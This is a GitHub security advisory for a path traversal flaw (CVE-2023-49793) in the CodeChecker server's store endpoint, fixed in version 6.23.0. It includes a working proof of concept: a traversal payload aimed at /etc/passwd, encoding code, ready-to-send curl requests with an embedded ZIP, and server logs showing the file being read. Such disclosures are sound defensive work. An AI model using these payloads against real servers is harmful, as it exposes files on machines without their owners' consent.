GHSA-h26w-r4m5-8rrf
Vulnerability from github
Published
2024-06-24 16:18
Modified
2024-06-26 21:56
Severity
6.5 (Medium) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Summary
CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`
Details

Summary

ZIP files uploaded to the server-side endpoint handling a CodeChecker store are not properly sanitized. An attacker can exercise a path traversal to make the CodeChecker server load and display files from an arbitrary location on the server machine.

Details

Target

The vulnerable endpoint is /<PRODUCT_URL>/v6.53/CodeCheckerService@massStoreRun.

Exploit overview

The attack is made possible by improper sanitization at one point in the process.

  1. When the ZIP file is uploaded by CodeChecker store, it is first unzipped to a temporary directory (safely).
  2. When deciding which files to insert into CodeChecker's internal database, the decision is made based on the content_hashes.json in the ZIP. An attacker has control over the contents of this file.
  3. After reading that file, the paths specified in the JSON are normalized by this code: https://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444
  4. Providing sufficiently many ../../s inside the content_hashes.json, an attacker can control the insertion of completely arbitrary files into CodeChecker's internal database.
  5. This is confirmed in the log output: mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd
  6. Once the file is inserted into the internal database, it can be displayed trivially on the Web interface. As CodeChecker doesn't distinguish between filenames after the ZIP is extraced, an attacker can define aliases in content_hashes.json. mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.
  7. The file is displayed in the Web UI if and only if there is at least one bug report in it. The bug reports are coming from the ZIP and the attacker can craft the required contents for this. If done so, the logs confirm the requirement for presenting the results of the exploit will be triggered: hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2
  8. The server emits the contents of the injected files from the server's database to all users: CodeChecker's Web UI showing the snapshot of the /etc/passwd file that was injected to the database due to the path traversal attack.

[!NOTE]
The file is shown with the contents as it was on the system when the exploited CodeChecker store was exercised. This attack does not allow the server to return the "live" contents of a file on the server's storage — the attacker(s) must recurringly exercise the exploit to keep the injected files "updated" in the database.

PoC

The minimal example that can trigger the exploit can be downloaded: PoC.zip.

The key to the exploit is the content_hashes.json file. The additional files create a report in the loaded /etc/passwd file, so it is displayed in the web UI.

/content_hashes.json ```json {"/../../../../../../../../../../../../../../../etc/passwd": "malformed_hash", "/etc/passwd": "malformed_hash"} ```

Uploading the ZIP to the server

The communication between the CodeChecker store and the server is done by transmitting the ZIP file in a Base64-encoded string.
Encoding the ZIP into the format of the API can be done with Python:

```py import base64 import zlib

with open("PoC.zip", "rb") as f: contents = f.read() encoded = base64.b64encode(zlib.compress(contents)) print(encoded) ```

The result of the compression and encoding can be sent to the running server over the API. When the API is called, the exploit is exercised.

bash curl "<SERVER_URL>/<PRODUCT_URL>/v6.53/CodeCheckerService" \ --data \ '[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4":{"str":"<ENCODED_ZIP>"},"5":{"tf":0}}]'

One-line PoC ```bash curl "http://localhost:8001/Default/v6.53/CodeCheckerService" \ --data \ '[1,"massStoreRun",1,0,{"1":{"str":"poc"},"3":{"str":"6.22.1"},"4" {"str":"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc="},"5":{"tf":0}}]' ```
Full server logs for the store processing ``` [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Unzip storage file... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP '/tmp/tmpenegwbxj.zip' to '/home/discookie/.codechecker/tmpx7hg1teb'... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1298 store() - Using unzipped folder '/home/discookie/.codechecker/tmpx7hg1teb' [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store source files... [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s). [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:463 __store_source_files() - 17 fileid found [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1363 store() - Storing into run 'poc' locked at '2023-10-25 14:30:31.615536'. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:686 __add_or_update_run() - Adding run 'poc'... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:730 __add_or_update_run() - Adding run history. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:755 __add_or_update_run() - Adding run done. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:61 __enter__() - [poc] Store reports... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1163 __store_reports() - Get reports from '/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43' directory [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1175 __store_reports() - Parsing input file 'sample.plist' [DEBUG][2023-10-25 14:30:31] {report-converter} [2043] <139754026274816> - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2 [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:987 __process_report_file() - Storing report to the database... [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:827 __add_report_context() - Storing bug path positions. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:834 __add_report_context() - Storing bug path events. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:842 __add_report_context() - Storing notes. [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:853 __add_report_context() - Storing macro expansions. [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s). [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec) [DEBUG][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1260 finish_checker_run() - Finishing checker run [INFO][2023-10-25 14:30:31] {server} [2043] <139754026274816> - mass_store_run.py:1397 store() - 'Anonymous' stored results (3 KB /decompressed/) to run 'poc' (id: 16) in 0.15 seconds. [INFO][2023-10-25 14:30:31] {store_time} [2043] <139754026274816> - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, "Default", "poc", 3KB, 1, 16 [DEBUG][2023-10-25 14:30:31] {profiler} [2043] <139754026274816> - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun ```

Impact

The path traversal vulnerability allows reading data on the machine of the CodeChecker server, with the same permission level as the CodeChecker server process. This allows for the exfiltration from the server-side storage medium. If the CodeChecker server is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the CodeChecker server, with the permission to store to a database, and view the stored reports.

CVSS 3.1 Base Score: 6.5 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Reproducible up to version 6.22.1.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "codechecker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.23.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-49793"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-24T16:18:09Z",
    "nvd_published_at": "2024-06-24T18:15:10Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nZIP files uploaded to the server-side endpoint handling a `CodeChecker store` are not properly sanitized. An attacker can exercise a path traversal to make the `CodeChecker server` load and display files from an arbitrary location on the server machine.\n\n## Details\n\n### Target\n\nThe vulnerable endpoint is `/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService@massStoreRun`.\n\n### Exploit overview\n\nThe attack is made possible by improper sanitization at one point in the process.\n\n1. When the ZIP file is uploaded by `CodeChecker store`, it is first unzipped to a temporary directory (safely).\n2. When deciding which files to insert into CodeChecker\u0027s internal database, the decision is made based on the `content_hashes.json` in the ZIP. An attacker has control over the contents of this file.\n3. After reading that file, the paths specified in the JSON are normalized by this code:\nhttps://github.com/Ericsson/codechecker/blob/fa41e4e5d9566b5a4f5a80a27bddec73a5146f5a/web/server/codechecker_server/api/mass_store_run.py#L442-L444\n4. Providing sufficiently many `../../`s inside the `content_hashes.json`, an attacker can control the insertion of completely arbitrary files into CodeChecker\u0027s internal database.\n5. This is confirmed in the log output:\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n```\n6. Once the file is inserted into the internal database, it can be displayed trivially on the Web interface.\nAs CodeChecker doesn\u0027t distinguish between filenames after the ZIP is extraced, an attacker can define aliases in `content_hashes.json`.\n```\nmass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\nmass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n```\n7. The file is displayed in the Web UI if and only if there is at least one _bug report_ in it.\nThe bug reports are coming from the ZIP and the attacker can craft the required contents for this.\nIf done so, the logs confirm the requirement for presenting the results of the exploit will be triggered:\n```\nhash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n```\n8. The server emits the contents of the injected files from the server\u0027s database to all users:\n![CodeChecker\u0027s Web UI showing the snapshot of the /etc/passwd file that was injected to the database due to the path traversal attack.](https://user-images.githubusercontent.com/16914176/278057281-2c6994ed-4c24-4026-a6b6-148ac43243ca.png)\n\n\u003e [!NOTE]  \n\u003e The file is shown with the contents as it was on the system when the exploited `CodeChecker store` was exercised. This attack does not allow the server to return the \"live\" contents of a file on the server\u0027s storage \u0026mdash; the attacker(s) must recurringly exercise the exploit to keep the injected files \"updated\" in the database.\n\n\n## PoC\n\nThe minimal example that can trigger the exploit can be downloaded: [`PoC.zip`](https://github.com/Ericsson/codechecker/files/14757143/PoC.zip).\n\nThe key to the exploit is the `content_hashes.json` file. The additional files create a report in the loaded `/etc/passwd` file, so it is displayed in the web UI.\n\n\u003cdetails\u003e\u003csummary\u003e\u003ctt\u003e/content_hashes.json\u003c/tt\u003e\u003c/summary\u003e\n\n```json\n{\"/../../../../../../../../../../../../../../../etc/passwd\": \"malformed_hash\", \"/etc/passwd\": \"malformed_hash\"}\n```\n\u003c/details\u003e\n\n#### Uploading the ZIP to the server\n\nThe communication between the `CodeChecker store` and the server is done by transmitting the ZIP file in a Base64-encoded string.  \nEncoding the ZIP into the format of the API can be done with Python:\n\n```py\nimport base64\nimport zlib\n\nwith open(\"PoC.zip\", \"rb\") as f:\n    contents = f.read()\nencoded = base64.b64encode(zlib.compress(contents))\nprint(encoded)\n```\n\nThe result of the compression and encoding can be sent to the running server over the API.\nWhen the API is called, the exploit is exercised.\n\n```bash\ncurl \"\u003cSERVER_URL\u003e/\u003cPRODUCT_URL\u003e/v6.53/CodeCheckerService\" \\\n    --data \\\n    \u0027[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\":{\"str\":\"\u003cENCODED_ZIP\u003e\"},\"5\":{\"tf\":0}}]\u0027\n```\n\n\u003cdetails\u003e\u003csummary\u003eOne-line PoC\u003c/summary\u003e\n\n```bash\ncurl \"http://localhost:8001/Default/v6.53/CodeCheckerService\" \\\n    --data \\\n    \u0027[1,\"massStoreRun\",1,0,{\"1\":{\"str\":\"poc\"},\"3\":{\"str\":\"6.22.1\"},\"4\" {\"str\":\"eJzNVk9vIzUUT3cpS4MqIcEB2Msw6oGV2vmXzKRZZVPYdpGqLSXSdrXqVquRM+NJhk7GI9tpN5Qe0SJx4MARCfEB+AaIE2glrnAAwY0DXwAQ4gT2ZCbj+ZNI2ROTWLaff+/5+edn+/XuXn2uXuOfi48frP7zh49Ym5eXWXFQSGFI7SEgQ0iU9wkKL2RVUZb4Q+qoESDk3JVvSvIIBB7CI+jGJuVNSV4MuOwx/16J/fvQP35QE74XWMEwQpgSNUMhnEfdEFCg5WoeMFxLc7Vtz2u0XVNvt0yrrbcA8JqN2MyUjK+YGeutk78fXqnVeLGWMTOCFLiAgilf63WJffIZxMRHIVujsZmIKEIBYYKTaZ9/F1kzhoRgBDktDnKhM4TOKcTyZgEDHMoM2+F4xJCN4qiDRiMQcm5PHhXHMp9kSzEMRZfe3Aag3296Ld2Ebrule6bnsbXp/WZjGxrA0TRNt6DeNG+U3DhH+NQPB7brY+hQhCfcrFqCoTGNxtSOAB1WAzAk44DaBI2xA23PDyDnqEBMjCRgFAVQiQKf0NiWEEp5+GWJsxAEkw/Y8rnp0ig59aMIcs604hD1R5BQNvE8p/pw4HNGdau9bTTaTaOpaJap66axWYGG8c4IWNPSrEazWXA/6ybNR+v1yyxa77Fo/WtlfPuja7UaL+Yy0Sqy2Nl5PAqkJCxuybqiyRIMWfCxjb0l3z96Z2tb3unWO2/svbd7dNy7I8VaUu/+7YP9XUneUtW3I2ZMVfeO9qTewf69I4nZUNU7h7IkDymNbqrq+fm5AjhKYaHJgez4YhRBTCcHzNgWU1Bc6spsmqn1nDtM6voO7dbXOqdw0nV9MAgRob5DOioXMDnAGPDGWopcm2IdQOGAxWUKZGJCMVtZ9wANfEeCGCPcURNZpsaPnc0PYlnRQRgqe/6Z78KHEKOysguJg/2IH9Cydo+dAYliwBcIgrKyT8gYxvegnV7EyLMDP4S2H05Fj2nZbMNtsE3vW6ahGc0WBF5ba+ltYDbclq41oFGeKECMm7yLM+oSElCQDa51fDb1AOKuzoyl7QzMz2wVWqsC8+VUgQuWO2p+M/n9Ibg72/Oc6+keRCJ2gUNTPLvF3Bw8oQuesR3IkTeXvrwXVRQuIrGaxkV+V1I5n8wcnYkyu9YIGMCqhS+I00QZg3AASU5X2JFiL0/OHHpEgsrrnUfRQpLm0bSIqAJVy/ve/P/43lHFbcj1xOOVyWfSTDZzveq+TQJDeIeFYCnYSJOkmZnUgXg0fZ9nay3c5XOu44DFIQFihGYLi/UGMISYvQOu3Z8sZ3uXZWC70wysfIEmT1RZa5pWVTqUNrI6fu669d7dlSs7tXlJ+UaS2EpJXZGi15PBldqrtU++6LQOr/2ycvr0z095/evn13/cY/V0knmZdTrJS6x8KSQTouWfn7weW/qe/Pvtu6xO+6LlcjYuWn66TJoiTj0xvV2+mB9+I8eHpannZfAic+srz5rPi358Ix98zOdP69c2rpf8KOdmoh9fX33GTE104+LJ7xt8+rT+7qeUjtXnOWaV/fYZBZ+9yHv/Ac5gmHc=\"},\"5\":{\"tf\":0}}]\u0027 \n```\n\u003c/details\u003e\n\n\u003cdetails\u003e\u003csummary\u003eFull server logs for the \u003ctt\u003estore\u003c/tt\u003e processing\u003c/summary\u003e\n\n```\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - server.py:342 do_POST() - 127.0.0.1:33352 -- [Anonymous] POST /Default/v6.53/CodeCheckerService@massStoreRun\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Unzip storage file...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:82 unzip() - Unzipping mass storage ZIP \u0027/tmp/tmpenegwbxj.zip\u0027 to \u0027/home/discookie/.codechecker/tmpx7hg1teb\u0027...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Unzip storage file done... (duration: 0.0 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1298 store() - Using unzipped folder \u0027/home/discookie/.codechecker/tmpx7hg1teb\u0027\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store source files...\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1310 store() - [poc] Storing 2 source file(s).\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:444 __store_source_files() - Storing source file: /home/discookie/.codechecker/tmpx7hg1teb/root/etc/passwd\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:453 __store_source_files() - /etc/passwd not found or already stored.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:463 __store_source_files() - 17 fileid found\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store source files done... (duration: 0.01 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1363 store() - Storing into run \u0027poc\u0027 locked at \u00272023-10-25 14:30:31.615536\u0027.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:686 __add_or_update_run() - Adding run \u0027poc\u0027...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:730 __add_or_update_run() - Adding run history.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:755 __add_or_update_run() - Adding run done.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:761 __add_or_update_run() - Storing analysis statistics done.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:61 __enter__() - [poc] Store reports...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from \u0027/home/discookie/.codechecker/tmpx7hg1teb/reports\u0027 directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1163 __store_reports() - Get reports from \u0027/home/discookie/.codechecker/tmpx7hg1teb/reports/a7d0fa2d60d08ff39d519756917aaf43\u0027 directory\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1175 __store_reports() - Parsing input file \u0027sample.plist\u0027\n[DEBUG][2023-10-25 14:30:31] {report-converter} [2043] \u003c139754026274816\u003e - hash.py:208 get_report_path_hash() - 2|12|Path traversal|/etc/passwdcore.DivideZero3d3a7db6520247eaf90719a53d7103e2\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:987 __process_report_file() - Storing report to the database...\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:827 __add_report_context() - Storing bug path positions.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:834 __add_report_context() - Storing bug path events.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:842 __add_report_context() - Storing notes.\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:853 __add_report_context() - Storing macro expansions.\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1220 __store_reports() - [poc] Processed 1 analyzer result file(s).\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:64 __exit__() - [poc] Store reports done... (duration: 0.1 sec)\n[DEBUG][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1260 finish_checker_run() - Finishing checker run\n[INFO][2023-10-25 14:30:31] {server} [2043] \u003c139754026274816\u003e - mass_store_run.py:1397 store() - \u0027Anonymous\u0027 stored results (3 KB /decompressed/) to run \u0027poc\u0027 (id: 16)  in 0.15 seconds.\n[INFO][2023-10-25 14:30:31] {store_time} [2043] \u003c139754026274816\u003e - mass_store_run.py:1414 store() - 2023-10-25T14:30:31.612326, 0.15s, \"Default\", \"poc\", 3KB, 1, 16\n[DEBUG][2023-10-25 14:30:31] {profiler} [2043] \u003c139754026274816\u003e - profiler.py:59 debug_wrapper() - [0.173351s] massStoreRun\n```\n\u003c/details\u003e\n\n## Impact\nThe path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server` process. This allows for the exfiltration from the server-side storage medium.\nIf the `CodeChecker server` is run with authentication enabled (not the default configuration), then the attack requires a valid user account on the `CodeChecker server`, with the permission to store to a database, and view the stored reports.\n\nCVSS 3.1 Base Score: 6.5\n[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\u0026version=3.1)\n\nReproducible up to version `6.22.1`.",
  "id": "GHSA-h26w-r4m5-8rrf",
  "modified": "2024-06-26T21:56:26Z",
  "published": "2024-06-24T16:18:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-h26w-r4m5-8rrf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49793"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Ericsson/codechecker/commit/46bada41e32f3ba0f6011d5c556b579f6dddf07a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Ericsson/codechecker"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/codechecker/PYSEC-2024-54.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "CodeChecker has a Path traversal in `CodeChecker server` in the endpoint of `CodeChecker store`"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.